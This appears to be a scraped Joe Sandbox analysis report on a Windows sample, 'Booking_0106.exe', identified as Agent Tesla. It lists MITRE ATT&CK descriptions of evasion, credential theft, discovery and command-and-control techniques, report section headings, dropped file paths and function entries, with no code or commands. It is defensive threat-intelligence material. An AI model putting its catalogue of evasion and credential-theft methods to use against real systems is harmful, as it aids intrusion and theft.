Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Booking_0106.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_doc-d.exe_5e585b193ca090cc6ffb3bcf3496af387fd1ff80_9cecdc5f_ec8e2bef-f1b2-4b14-92bf-16376956ae86\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6909.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A81.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AF0.tmp.xml

C:\Users\user\AppData\Local\Temp\doc-d.exe

C:\Users\user\AppData\Roaming\ibrzb.exe

C:\Users\user\AppData\Roaming\ibrzb.exe:Zone.Identifier

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
Booking_0106.exe

Function 01437C08 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 01430E88 Relevance: 3.1, Strings: 2, Instructions: 588
COMMON

Function 05A3C748 Relevance: 3.0, Strings: 2, Instructions: 542
COMMON

Function 01430E78 Relevance: 2.9, Strings: 2, Instructions: 371
COMMON

Function 01430EC2 Relevance: 2.9, Strings: 2, Instructions: 361
COMMON

Function 01430F39 Relevance: 2.8, Strings: 2, Instructions: 333
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre